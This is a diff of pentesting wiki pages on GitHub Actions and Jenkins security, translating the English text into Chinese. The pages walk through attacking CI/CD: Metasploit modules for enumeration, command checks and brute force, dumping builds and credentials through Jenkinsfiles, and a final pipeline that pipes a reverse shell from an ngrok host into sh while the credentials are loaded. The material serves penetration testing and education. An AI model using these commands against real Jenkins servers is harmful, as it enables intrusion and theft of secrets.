-- A GitHub App should **take actions independent of a user** (unless the app is using a [user-to-server](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests) token). To keep user-to-server access tokens more secure, you can use access tokens that will expire after 8 hours, and a refresh token that can be exchanged for a new access token. For more information, see "[Refreshing user-to-server access tokens](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)."
-- Make sure the GitHub App integrates with **specific repositories**.
-- The GitHub App should **connect to a personal account or an organisation**.
-- Don't expect the GitHub App to know and do everything a user can.
-- **Don't use a GitHub App if you just need a "Login with GitHub" service**. But a GitHub App can use a [user identification flow](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) to log users in _and_ do other things.
-- Don't build a GitHub App if you _only_ want to act as a GitHub user and do everything that user can do.
-- If you are using your app with GitHub Actions and want to modify workflow files, you must authenticate on behalf of the user with an OAuth token that includes the `workflow` scope. The user must have admin or write permission to the repository that contains the workflow file. For more information, see "[Understanding scopes for OAuth apps](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)."
-- **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps).
+- GitHub 应用应 **独立于用户采取行动**(除非应用使用 [用户到服务器](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests) 令牌)。为了使用户到服务器的访问令牌更安全,您可以使用将在 8 小时后过期的访问令牌,以及可以交换为新访问令牌的刷新令牌。有关更多信息,请参见“[刷新用户到服务器的访问令牌](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)”。
+- 确保 GitHub 应用与 **特定代码库** 集成。
+- GitHub 应用应 **连接到个人帐户或组织**。
+- 不要期望 GitHub 应用知道并做用户可以做的所有事情。
+- **如果您只需要“使用 GitHub 登录”服务,请不要使用 GitHub 应用**。但是,GitHub 应用可以使用 [用户识别流程](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) 来登录用户 _并_ 执行其他操作。
+- 如果您使用应用与 GitHub Actions,并希望修改工作流文件,您必须代表用户使用包含 `workflow` 范围的 OAuth 令牌进行身份验证。用户必须对包含工作流文件的代码库具有管理员或写入权限。有关更多信息,请参见“[了解 OAuth 应用的范围](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)”。
+- **更多** 信息在 [这里](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps)。
### Github Actions
-This **isn't a way to authenticate in github**, but a **malicious** Github Action could get **unauthorised access to github** and **depending** on the **privileges** given to the Action several **different attacks** could be done. See below for more information.
+这 **不是在 GitHub 中进行身份验证的方法**,但一个 **恶意** 的 GitHub Action 可能会获得 **未经授权的访问 GitHub**,并且 **根据** 赋予 Action 的 **权限**,可能会进行几种 **不同的攻击**。有关更多信息,请参见下文。
-## Git Actions
+## Git 操作
-Git actions allows to automate the **execution of code when an event happen**. Usually the code executed is **somehow related to the code of the repository** (maybe build a docker container or check that the PR doesn't contain secrets).
+Git 操作允许在事件发生时自动化 **代码的执行**。通常执行的代码与 **代码库的代码有某种关系**(可能构建一个 docker 容器或检查 PR 是否包含秘密)。
-### Configuration
+### 配置
-In _https://github.com/organizations/\/settings/actions_ it's possible to check the **configuration of the github actions** for the organization.
+在 _https://github.com/organizations/\/settings/actions_ 中,可以检查组织的 **GitHub Actions 配置**。
-It's possible to disallow the use of github actions completely, **allow all github actions**, or just allow certain actions.
+可以完全禁止使用 GitHub Actions,**允许所有 GitHub Actions**,或仅允许某些操作。
-It's also possible to configure **who needs approval to run a Github Action** and the **permissions of the GITHUB_TOKEN** of a Github Action when it's run.
+还可以配置 **谁需要批准才能运行 GitHub Action** 以及运行时 GitHub Action 的 **GITHUB_TOKEN 权限**。
-### Git Secrets
+### Git 秘密
-Github Action usually need some kind of secrets to interact with github or third party applications. To **avoid putting them in clear-text** in the repo, github allow to put them as **Secrets**.
-
-These secrets can be configured **for the repo or for all the organization**. Then, in order for the **Action to be able to access the secret** you need to declare it like:
+GitHub Action 通常需要某种秘密与 GitHub 或第三方应用程序进行交互。为了 **避免将它们以明文形式放入代码库**,GitHub 允许将它们作为 **秘密** 放置。
+这些秘密可以为 **代码库或整个组织** 配置。然后,为了使 **Action 能够访问秘密**,您需要将其声明为:
```yaml
steps:
- - name: Hello world action
- with: # Set the secret as an input
- super_secret:${{ secrets.SuperSecret }}
- env: # Or as an environment variable
- super_secret:${{ secrets.SuperSecret }}
+- name: Hello world action
+with: # Set the secret as an input
+super_secret:${{ secrets.SuperSecret }}
+env: # Or as an environment variable
+super_secret:${{ secrets.SuperSecret }}
```
-
-#### Example using Bash
-
+#### 使用 Bash 的示例
```yaml
steps:
- - shell: bash
- env: SUPER_SECRET:${{ secrets.SuperSecret }}
- run: |
- example-command "$SUPER_SECRET"
+- shell: bash
+env: SUPER_SECRET:${{ secrets.SuperSecret }}
+run: |
+example-command "$SUPER_SECRET"
```
-
> [!WARNING]
-> Secrets **can only be accessed from the Github Actions** that have them declared.
+> Secrets **只能通过声明它们的 Github Actions 访问**。
-> Once configured in the repo or the organizations **users of github won't be able to access them again**, they just will be able to **change them**.
+> 一旦在仓库或组织中配置,**github 用户将无法再次访问它们**,他们只能**更改它们**。
-Therefore, the **only way to steal github secrets is to be able to access the machine that is executing the Github Action** (in that scenario you will be able to access only the secrets declared for the Action).
+因此,**窃取 github secrets 的唯一方法是能够访问执行 Github Action 的机器**(在这种情况下,您将只能访问为该 Action 声明的 secrets)。
-### Git Environments
-
-Github allows to create **environments** where you can save **secrets**. Then, you can give the github action access to the secrets inside the environment with something like:
+### Git 环境
+Github 允许创建 **环境**,您可以在其中保存 **secrets**。然后,您可以通过类似以下方式授予 github action 访问环境中的 secrets:
```yaml
jobs:
- deployment:
- runs-on: ubuntu-latest
- environment: env_name
+deployment:
+runs-on: ubuntu-latest
+environment: env_name
```
-
-You can configure an environment to be **accessed** by **all branches** (default), **only protected** branches or **specify** which branches can access it.\
-It can also set a **number of required reviews** before **executing** an **action** using an **environment** or **wait** some **time** before allowing deployments to proceed.
+您可以配置一个环境以**被所有分支访问**(默认),**仅受保护的**分支或**指定**可以访问它的分支。\
+它还可以设置**执行**某个**操作**之前所需的**审核数量**,或者**等待**一段**时间**再允许部署继续。
### Git Action Runner
-A Github Action can be **executed inside the github environment** or can be executed in a **third party infrastructure** configured by the user.
+Github Action可以**在github环境中执行**,也可以在用户配置的**第三方基础设施**中执行。
-Several organizations will allow to run Github Actions in a **third party infrastructure** as it use to be **cheaper**.
+一些组织将允许在**第三方基础设施**中运行Github Actions,因为这通常是**更便宜**的。
-You can **list the self-hosted runners** of an organization in _https://github.com/organizations/\/settings/actions/runners_
+您可以在 _https://github.com/organizations/\/settings/actions/runners_ 列出组织的自托管运行器。
-The way to find which **Github Actions are being executed in non-github infrastructure** is to search for `runs-on: self-hosted` in the Github Action configuration yaml.
+查找**在非github基础设施中执行的Github Actions**的方法是搜索Github Action配置yaml中的 `runs-on: self-hosted`。
-It's **not possible to run a Github Action of an organization inside a self hosted box** of a different organization because **a unique token is generated for the Runner** when configuring it to know where the runner belongs.
+**不可能在不同组织的自托管环境中运行组织的Github Action**,因为**在配置Runner时会生成一个唯一的令牌**以知道该Runner属于哪里。
-If the custom **Github Runner is configured in a machine inside AWS or GCP** for example, the Action **could have access to the metadata endpoint** and **steal the token of the service account** the machine is running with.
+如果自定义**Github Runner配置在AWS或GCP内部的机器上**,例如,该Action**可能会访问元数据端点**并**窃取服务帐户的令牌**,该机器正在运行。
### Git Action Compromise
-If all actions (or a malicious action) are allowed a user could use a **Github action** that is **malicious** and will **compromise** the **container** where it's being executed.
+如果允许所有操作(或恶意操作),用户可能会使用一个**恶意的Github Action**,这将**危害**正在执行的**容器**。
> [!CAUTION]
-> A **malicious Github Action** run could be **abused** by the attacker to:
+> 一个**恶意的Github Action**运行可能会被攻击者**滥用**:
>
-> - **Steal all the secrets** the Action has access to
-> - **Move laterally** if the Action is executed inside a **third party infrastructure** where the SA token used to run the machine can be accessed (probably via the metadata service)
-> - **Abuse the token** used by the **workflow** to **steal the code of the repo** where the Action is executed or **even modify it**.
+> - **窃取所有秘密**,该Action可以访问
+> - **横向移动**,如果该Action在**第三方基础设施**中执行,可以访问用于运行机器的SA令牌(可能通过元数据服务)
+> - **滥用工作流**使用的令牌,以**窃取执行该Action的repo的代码**或**甚至修改它**。
## Branch Protections
-Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**.
+分支保护旨在**不将完整控制权授予用户**。目标是**在能够在某个分支中编写代码之前设置多个保护方法**。
-The **branch protections of a repository** can be found in _https://github.com/\/\/settings/branches_
+**一个仓库的分支保护**可以在 _https://github.com/\/\/settings/branches_ 找到。
> [!NOTE]
-> It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo.
+> **不可能在组织级别设置分支保护**。因此,所有保护必须在每个repo中声明。
-Different protections can be applied to a branch (like to master):
+可以对分支应用不同的保护(例如对master):
-- You can **require a PR before merging** (so you cannot directly merge code over the branch). If this is select different other protections can be in place:
- - **Require a number of approvals**. It's very common to require 1 or 2 more people to approve your PR so a single user isn't capable of merge code directly.
- - **Dismiss approvals when new commits are pushed**. If not, a user may approve legit code and then the user could add malicious code and merge it.
- - **Require reviews from Code Owners**. At least 1 code owner of the repo needs to approve the PR (so "random" users cannot approve it)
- - **Restrict who can dismiss pull request reviews.** You can specify people or teams allowed to dismiss pull request reviews.
- - **Allow specified actors to bypass pull request requirements**. These users will be able to bypass previous restrictions.
-- **Require status checks to pass before merging.** Some checks needs to pass before being able to merge the commit (like a github action checking there isn't any cleartext secret).
-- **Require conversation resolution before merging**. All comments on the code needs to be resolved before the PR can be merged.
-- **Require signed commits**. The commits need to be signed.
-- **Require linear history.** Prevent merge commits from being pushed to matching branches.
-- **Include administrators**. If this isn't set, admins can bypass the restrictions.
-- **Restrict who can push to matching branches**. Restrict who can send a PR.
+- 您可以**要求在合并之前进行PR**(因此您不能直接在分支上合并代码)。如果选择此项,则可以实施其他不同的保护:
+- **要求一定数量的批准**。通常需要1或2个以上的人批准您的PR,以便单个用户无法直接合并代码。
+- **在推送新提交时撤销批准**。否则,用户可能会批准合法代码,然后用户可以添加恶意代码并合并。
+- **要求代码所有者进行审核**。至少需要1个代码所有者批准PR(因此“随机”用户无法批准)。
+- **限制谁可以撤销拉取请求审核**。您可以指定允许撤销拉取请求审核的人员或团队。
+- **允许指定的参与者绕过拉取请求要求**。这些用户将能够绕过先前的限制。
+- **要求状态检查在合并之前通过**。某些检查需要在能够合并提交之前通过(例如,检查没有明文秘密的github action)。
+- **要求在合并之前解决对话**。所有代码上的评论需要在PR合并之前解决。
+- **要求签名提交**。提交需要签名。
+- **要求线性历史**。防止将合并提交推送到匹配的分支。
+- **包括管理员**。如果未设置此项,管理员可以绕过限制。
+- **限制谁可以推送到匹配的分支**。限制谁可以发送PR。
> [!NOTE]
-> As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline.
+> 如您所见,即使您设法获得某个用户的凭据,**repos可能受到保护,避免您将代码推送到master**,例如,以危害CI/CD管道。
## References
@@ -253,7 +246,3 @@ Different protections can be applied to a branch (like to master):
- [https://docs.github.com/en/actions/security-guides/encrypted-secrets](https://docs.github.com/en/actions/security-guides/encrypted-secrets)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/README.md b/src/pentesting-ci-cd/jenkins-security/README.md
index 4dfba3ff3..0145b1df9 100644
--- a/src/pentesting-ci-cd/jenkins-security/README.md
+++ b/src/pentesting-ci-cd/jenkins-security/README.md
@@ -2,311 +2,291 @@
{{#include ../../banners/hacktricks-training.md}}
-## Basic Information
+## 基本信息
-Jenkins is a tool that offers a straightforward method for establishing a **continuous integration** or **continuous delivery** (CI/CD) environment for almost **any** combination of **programming languages** and source code repositories using pipelines. Furthermore, it automates various routine development tasks. While Jenkins doesn't eliminate the **need to create scripts for individual steps**, it does provide a faster and more robust way to integrate the entire sequence of build, test, and deployment tools than one can easily construct manually.
+Jenkins 是一个工具,提供了一种简单的方法来建立几乎 **任何** 编程语言和源代码库组合的 **持续集成** 或 **持续交付** (CI/CD) 环境,使用管道。此外,它还自动化了各种常规开发任务。虽然 Jenkins 并不消除 **为单个步骤创建脚本的需要**,但它确实提供了一种比手动构建更快、更强大的方式来集成整个构建、测试和部署工具的序列。
{{#ref}}
basic-jenkins-information.md
{{#endref}}
-## Unauthenticated Enumeration
-
-In order to search for interesting Jenkins pages without authentication like (_/people_ or _/asynchPeople_, this lists the current users) you can use:
+## 未经身份验证的枚举
+为了在没有身份验证的情况下搜索有趣的 Jenkins 页面,如 (_/people_ 或 _/asynchPeople_,这列出了当前用户),您可以使用:
```
msf> use auxiliary/scanner/http/jenkins_enum
```
-
-Check if you can execute commands without needing authentication:
-
+检查您是否可以在不需要身份验证的情况下执行命令:
```
msf> use auxiliary/scanner/http/jenkins_command
```
+在没有凭据的情况下,您可以查看 _**/asynchPeople/**_ 路径或 _**/securityRealm/user/admin/search/index?q=**_ 以获取 **用户名**。
-Without credentials you can look inside _**/asynchPeople/**_ path or _**/securityRealm/user/admin/search/index?q=**_ for **usernames**.
-
-You may be able to get the Jenkins version from the path _**/oops**_ or _**/error**_
+您可能能够从路径 _**/oops**_ 或 _**/error**_ 获取 Jenkins 版本。
.png>)
-### Known Vulnerabilities
+### 已知漏洞
{{#ref}}
https://github.com/gquere/pwn_jenkins
{{#endref}}
-## Login
+## 登录
-In the basic information you can check **all the ways to login inside Jenkins**:
+在基本信息中,您可以检查 **所有登录 Jenkins 的方式**:
{{#ref}}
basic-jenkins-information.md
{{#endref}}
-### Register
+### 注册
-You will be able to find Jenkins instances that **allow you to create an account and login inside of it. As simple as that.**
+您将能够找到 **允许您创建帐户并登录的 Jenkins 实例。就这么简单。**
-### **SSO Login**
+### **SSO 登录**
-Also if **SSO** **functionality**/**plugins** were present then you should attempt to **log-in** to the application using a test account (i.e., a test **Github/Bitbucket account**). Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/).
+如果存在 **SSO** **功能**/**插件**,那么您应该尝试使用测试帐户(即测试 **Github/Bitbucket 帐户**)登录应用程序。从 [**这里**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/) 获取技巧。
-### Bruteforce
-
-**Jenkins** lacks **password policy** and **username brute-force mitigation**. It's essential to **brute-force** users since **weak passwords** or **usernames as passwords** may be in use, even **reversed usernames as passwords**.
+### 暴力破解
+**Jenkins** 缺乏 **密码策略** 和 **用户名暴力破解缓解**。对用户进行 **暴力破解** 是至关重要的,因为可能使用 **弱密码** 或 **用户名作为密码**,甚至 **反向用户名作为密码**。
```
msf> use auxiliary/scanner/http/jenkins_login
```
+### 密码喷洒
-### Password spraying
+使用 [这个 python 脚本](https://github.com/gquere/pwn_jenkins/blob/master/password_spraying/jenkins_password_spraying.py) 或 [这个 powershell 脚本](https://github.com/chryzsh/JenkinsPasswordSpray)。
-Use [this python script](https://github.com/gquere/pwn_jenkins/blob/master/password_spraying/jenkins_password_spraying.py) or [this powershell script](https://github.com/chryzsh/JenkinsPasswordSpray).
+### IP 白名单绕过
-### IP Whitelisting Bypass
+许多组织将 **基于 SaaS 的源代码管理 (SCM) 系统**(如 GitHub 或 GitLab)与 **内部自托管的 CI** 解决方案(如 Jenkins 或 TeamCity)结合使用。此设置允许 CI 系统 **接收来自 SaaS 源代码控制供应商的 webhook 事件**,主要用于触发管道作业。
-Many organizations combine **SaaS-based source control management (SCM) systems** such as GitHub or GitLab with an **internal, self-hosted CI** solution like Jenkins or TeamCity. This setup allows CI systems to **receive webhook events from SaaS source control vendors**, primarily for triggering pipeline jobs.
+为了实现这一点,组织 **将 SCM 平台的 IP 范围列入白名单**,允许它们通过 **webhooks** 访问 **内部 CI 系统**。然而,重要的是要注意,**任何人**都可以在 GitHub 或 GitLab 上创建一个 **账户** 并将其配置为 **触发 webhook**,可能会向 **内部 CI 系统** 发送请求。
-To achieve this, organizations **whitelist** the **IP ranges** of the **SCM platforms**, permitting them to access the **internal CI system** via **webhooks**. However, it's important to note that **anyone** can create an **account** on GitHub or GitLab and configure it to **trigger a webhook**, potentially sending requests to the **internal CI system**.
+检查: [https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/](https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/)
-Check: [https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/](https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/)
+## 内部 Jenkins 滥用
-## Internal Jenkins Abuses
-
-In these scenarios we are going to suppose you have a valid account to access Jenkins.
+在这些场景中,我们假设您有一个有效的账户来访问 Jenkins。
> [!WARNING]
-> Depending on the **Authorization** mechanism configured in Jenkins and the permission of the compromised user you **might be able or not to perform the following attacks.**
+> 根据在 Jenkins 中配置的 **授权** 机制和被攻陷用户的权限,您 **可能能够或无法执行以下攻击**。
-For more information check the basic information:
+有关更多信息,请查看基本信息:
{{#ref}}
basic-jenkins-information.md
{{#endref}}
-### Listing users
+### 列出用户
-If you have accessed Jenkins you can list other registered users in [http://127.0.0.1:8080/asynchPeople/](http://127.0.0.1:8080/asynchPeople/)
+如果您已访问 Jenkins,您可以在 [http://127.0.0.1:8080/asynchPeople/](http://127.0.0.1:8080/asynchPeople/) 列出其他注册用户。
-### Dumping builds to find cleartext secrets
-
-Use [this script](https://github.com/gquere/pwn_jenkins/blob/master/dump_builds/jenkins_dump_builds.py) to dump build console outputs and build environment variables to hopefully find cleartext secrets.
+### 转储构建以查找明文秘密
+使用 [这个脚本](https://github.com/gquere/pwn_jenkins/blob/master/dump_builds/jenkins_dump_builds.py) 转储构建控制台输出和构建环境变量,以希望找到明文秘密。
```bash
python3 jenkins_dump_builds.py -u alice -p alice http://127.0.0.1:8080/ -o build_dumps
cd build_dumps
gitleaks detect --no-git -v
```
+### **窃取 SSH 凭证**
-### **Stealing SSH Credentials**
-
-If the compromised user has **enough privileges to create/modify a new Jenkins node** and SSH credentials are already stored to access other nodes, he could **steal those credentials** by creating/modifying a node and **setting a host that will record the credentials** without verifying the host key:
+如果被攻陷的用户具有 **足够的权限来创建/修改新的 Jenkins 节点**,并且 SSH 凭证已经存储以访问其他节点,他可以通过创建/修改一个节点并 **设置一个将记录凭证的主机** 而不验证主机密钥来 **窃取这些凭证**:
.png>)
-You will usually find Jenkins ssh credentials in a **global provider** (`/credentials/`), so you can also dump them as you would dump any other secret. More information in the [**Dumping secrets section**](./#dumping-secrets).
+您通常可以在 **全局提供者** (`/credentials/`) 中找到 Jenkins ssh 凭证,因此您也可以像转储任何其他秘密一样转储它们。更多信息请参见 [**转储秘密部分**](./#dumping-secrets)。
-### **RCE in Jenkins**
+### **Jenkins 中的 RCE**
-Getting a **shell in the Jenkins server** gives the attacker the opportunity to leak all the **secrets** and **env variables** and to **exploit other machines** located in the same network or even **gather cloud credentials**.
+在 Jenkins 服务器上获得 **shell** 使攻击者有机会泄露所有 **秘密** 和 **环境变量**,并 **利用同一网络中的其他机器**,甚至 **收集云凭证**。
-By default, Jenkins will **run as SYSTEM**. So, compromising it will give the attacker **SYSTEM privileges**.
+默认情况下,Jenkins 将 **以 SYSTEM 身份运行**。因此,攻陷它将使攻击者获得 **SYSTEM 权限**。
-### **RCE Creating/Modifying a project**
+### **创建/修改项目的 RCE**
-Creating/Modifying a project is a way to obtain RCE over the Jenkins server:
+创建/修改项目是获得 Jenkins 服务器 RCE 的一种方式:
{{#ref}}
jenkins-rce-creating-modifying-project.md
{{#endref}}
-### **RCE Execute Groovy script**
+### **执行 Groovy 脚本的 RCE**
-You can also obtain RCE executing a Groovy script, which might my stealthier than creating a new project:
+您还可以通过执行 Groovy 脚本来获得 RCE,这可能比创建新项目更隐蔽:
{{#ref}}
jenkins-rce-with-groovy-script.md
{{#endref}}
-### RCE Creating/Modifying Pipeline
+### 创建/修改管道的 RCE
-You can also get **RCE by creating/modifying a pipeline**:
+您还可以通过 **创建/修改管道** 来获得 **RCE**:
{{#ref}}
jenkins-rce-creating-modifying-pipeline.md
{{#endref}}
-## Pipeline Exploitation
+## 管道利用
-To exploit pipelines you still need to have access to Jenkins.
+要利用管道,您仍然需要访问 Jenkins。
-### Build Pipelines
+### 构建管道
-**Pipelines** can also be used as **build mechanism in projects**, in that case it can be configured a **file inside the repository** that will contains the pipeline syntax. By default `/Jenkinsfile` is used:
+**管道** 也可以用作 **项目中的构建机制**,在这种情况下,可以配置一个 **存储库中的文件**,该文件将包含管道语法。默认使用 `/Jenkinsfile`:
.png>)
-It's also possible to **store pipeline configuration files in other places** (in other repositories for example) with the goal of **separating** the repository **access** and the pipeline access.
+还可以 **将管道配置文件存储在其他地方**(例如在其他存储库中),目的是 **分离** 存储库 **访问** 和管道访问。
-If an attacker have **write access over that file** he will be able to **modify** it and **potentially trigger** the pipeline without even having access to Jenkins.\
-It's possible that the attacker will need to **bypass some branch protections** (depending on the platform and the user privileges they could be bypassed or not).
+如果攻击者对该文件具有 **写入访问权限**,他将能够 **修改** 它并 **可能触发** 管道,而无需访问 Jenkins。\
+攻击者可能需要 **绕过一些分支保护**(根据平台和用户权限,这些保护可能会被绕过或不被绕过)。
-The most common triggers to execute a custom pipeline are:
+执行自定义管道的最常见触发器是:
-- **Pull request** to the main branch (or potentially to other branches)
-- **Push to the main branch** (or potentially to other branches)
-- **Update the main branch** and wait until it's executed somehow
+- **向主分支的拉取请求**(或可能是其他分支)
+- **推送到主分支**(或可能是其他分支)
+- **更新主分支** 并等待以某种方式执行
> [!NOTE]
-> If you are an **external user** you shouldn't expect to create a **PR to the main branch** of the repo of **other user/organization** and **trigger the pipeline**... but if it's **bad configured** you could fully **compromise companies just by exploiting this**.
+> 如果您是 **外部用户**,您不应该期望创建 **PR 到其他用户/组织的主分支** 并 **触发管道**... 但如果配置 **不当**,您可能会通过利用这一点完全 **攻陷公司**。
-### Pipeline RCE
+### 管道 RCE
-In the previous RCE section it was already indicated a technique to [**get RCE modifying a pipeline**](./#rce-creating-modifying-pipeline).
+在前面的 RCE 部分中,已经指明了一种技术来 [**通过修改管道获取 RCE**](./#rce-creating-modifying-pipeline)。
-### Checking Env variables
-
-It's possible to declare **clear text env variables** for the whole pipeline or for specific stages. This env variables **shouldn't contain sensitive info**, but and attacker could always **check all the pipeline** configurations/Jenkinsfiles:
+### 检查环境变量
+可以为整个管道或特定阶段声明 **明文环境变量**。这些环境变量 **不应包含敏感信息**,但攻击者始终可以 **检查所有管道** 配置/Jenkinsfiles:
```bash
pipeline {
- agent {label 'built-in'}
- environment {
- GENERIC_ENV_VAR = "Test pipeline ENV variables."
- }
+agent {label 'built-in'}
+environment {
+GENERIC_ENV_VAR = "Test pipeline ENV variables."
+}
- stages {
- stage("Build") {
- environment {
- STAGE_ENV_VAR = "Test stage ENV variables."
- }
- steps {
+stages {
+stage("Build") {
+environment {
+STAGE_ENV_VAR = "Test stage ENV variables."
+}
+steps {
```
-
### Dumping secrets
-For information about how are secrets usually treated by Jenkins check out the basic information:
+有关Jenkins通常如何处理秘密的信息,请查看基本信息:
{{#ref}}
basic-jenkins-information.md
{{#endref}}
-Credentials can be **scoped to global providers** (`/credentials/`) or to **specific projects** (`/job//configure`). Therefore, in order to exfiltrate all of them you need to **compromise at least all the projects** that contains secrets and execute custom/poisoned pipelines.
-
-There is another problem, in order to get a **secret inside the env** of a pipeline you need to **know the name and type of the secret**. For example, you try lo **load** a **`usernamePassword`** **secret** as a **`string`** **secret** you will get this **error**:
+凭据可以**作用于全局提供者**(`/credentials/`)或**特定项目**(`/job//configure`)。因此,为了提取所有凭据,您需要**至少妥协所有包含秘密的项目**并执行自定义/被污染的管道。
+还有另一个问题,为了在管道的**环境中获取一个秘密**,您需要**知道秘密的名称和类型**。例如,如果您尝试将一个**`usernamePassword`** **秘密**作为**`string`** **秘密**加载,您将收到此**错误**:
```
ERROR: Credentials 'flag2' is of type 'Username with password' where 'org.jenkinsci.plugins.plaincredentials.StringCredentials' was expected
```
-
-Here you have the way to load some common secret types:
-
+这里是加载一些常见秘密类型的方法:
```bash
withCredentials([usernamePassword(credentialsId: 'flag2', usernameVariable: 'USERNAME', passwordVariable: 'PASS')]) {
- sh '''
- env #Search for USERNAME and PASS
- '''
+sh '''
+env #Search for USERNAME and PASS
+'''
}
withCredentials([string(credentialsId: 'flag1', variable: 'SECRET')]) {
- sh '''
- env #Search for SECRET
- '''
+sh '''
+env #Search for SECRET
+'''
}
withCredentials([usernameColonPassword(credentialsId: 'mylogin', variable: 'USERPASS')]) {
- sh '''
- env # Search for USERPASS
- '''
+sh '''
+env # Search for USERPASS
+'''
}
# You can also load multiple env variables at once
withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
- string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
- sh '''
- env
- '''
+string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
+sh '''
+env
+'''
}
```
-
-At the end of this page you can **find all the credential types**: [https://www.jenkins.io/doc/pipeline/steps/credentials-binding/](https://www.jenkins.io/doc/pipeline/steps/credentials-binding/)
+在本页面的末尾,您可以**找到所有凭证类型**:[https://www.jenkins.io/doc/pipeline/steps/credentials-binding/](https://www.jenkins.io/doc/pipeline/steps/credentials-binding/)
> [!WARNING]
-> The best way to **dump all the secrets at once** is by **compromising** the **Jenkins** machine (running a reverse shell in the **built-in node** for example) and then **leaking** the **master keys** and the **encrypted secrets** and decrypting them offline.\
-> More on how to do this in the [Nodes & Agents section](./#nodes-and-agents) and in the [Post Exploitation section](./#post-exploitation).
+> **一次性转储所有秘密**的最佳方法是**妥协****Jenkins**机器(例如在**内置节点**中运行反向 shell),然后**泄露****主密钥**和**加密秘密**并离线解密它们。\
+> 有关如何执行此操作的更多信息,请参见[节点和代理部分](./#nodes-and-agents)和[后期利用部分](./#post-exploitation)。
-### Triggers
+### 触发器
-From [the docs](https://www.jenkins.io/doc/book/pipeline/syntax/#triggers): The `triggers` directive defines the **automated ways in which the Pipeline should be re-triggered**. For Pipelines which are integrated with a source such as GitHub or BitBucket, `triggers` may not be necessary as webhooks-based integration will likely already be present. The triggers currently available are `cron`, `pollSCM` and `upstream`.
-
-Cron example:
+来自[文档](https://www.jenkins.io/doc/book/pipeline/syntax/#triggers):`triggers`指令定义了**管道应重新触发的自动方式**。对于与 GitHub 或 BitBucket 等源集成的管道,`triggers`可能不是必需的,因为基于 webhook 的集成可能已经存在。当前可用的触发器有`cron`、`pollSCM`和`upstream`。
+Cron 示例:
```bash
triggers { cron('H */4 * * 1-5') }
```
+检查 **文档中的其他示例**。
-Check **other examples in the docs**.
+### 节点与代理
-### Nodes & Agents
+一个 **Jenkins 实例** 可能在 **不同的机器上运行不同的代理**。从攻击者的角度来看,访问不同的机器意味着 **不同的潜在云凭证** 可以被窃取或 **不同的网络访问** 可能被滥用以利用其他机器。
-A **Jenkins instance** might have **different agents running in different machines**. From an attacker perspective, access to different machines means **different potential cloud credentials** to steal or **different network access** that could be abuse to exploit other machines.
-
-For more information check the basic information:
+有关更多信息,请查看基本信息:
{{#ref}}
basic-jenkins-information.md
{{#endref}}
-You can enumerate the **configured nodes** in `/computer/`, you will usually find the \*\*`Built-In Node` \*\* (which is the node running Jenkins) and potentially more:
+您可以在 `/computer/` 中枚举 **配置的节点**,通常会找到 **`内置节点`**(即运行 Jenkins 的节点)以及可能更多的节点:
.png>)
-It is **specially interesting to compromise the Built-In node** because it contains sensitive Jenkins information.
-
-To indicate you want to **run** the **pipeline** in the **built-in Jenkins node** you can specify inside the pipeline the following config:
+**攻陷内置节点** 特别有趣,因为它包含敏感的 Jenkins 信息。
+要指示您想在 **内置 Jenkins 节点** 中 **运行** **管道**,您可以在管道中指定以下配置:
```bash
pipeline {
- agent {label 'built-in'}
+agent {label 'built-in'}
```
+### 完整示例
-### Complete example
-
-Pipeline in an specific agent, with a cron trigger, with pipeline and stage env variables, loading 2 variables in a step and sending a reverse shell:
-
+在特定代理中的管道,带有 cron 触发器,具有管道和阶段环境变量,在一个步骤中加载 2 个变量并发送反向 shell:
```bash
pipeline {
- agent {label 'built-in'}
- triggers { cron('H */4 * * 1-5') }
- environment {
- GENERIC_ENV_VAR = "Test pipeline ENV variables."
- }
+agent {label 'built-in'}
+triggers { cron('H */4 * * 1-5') }
+environment {
+GENERIC_ENV_VAR = "Test pipeline ENV variables."
+}
- stages {
- stage("Build") {
- environment {
- STAGE_ENV_VAR = "Test stage ENV variables."
- }
- steps {
- withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
- string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
- sh '''
- curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh PASS
- '''
- }
- }
- }
+stages {
+stage("Build") {
+environment {
+STAGE_ENV_VAR = "Test stage ENV variables."
+}
+steps {
+withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
+string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
+sh '''
+curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh PASS
+'''
+}
+}
+}
- post {
- always {
- cleanWs()
- }
- }
+post {
+always {
+cleanWs()
+}
+}
}
```
-
-## Arbitrary File Read to RCE
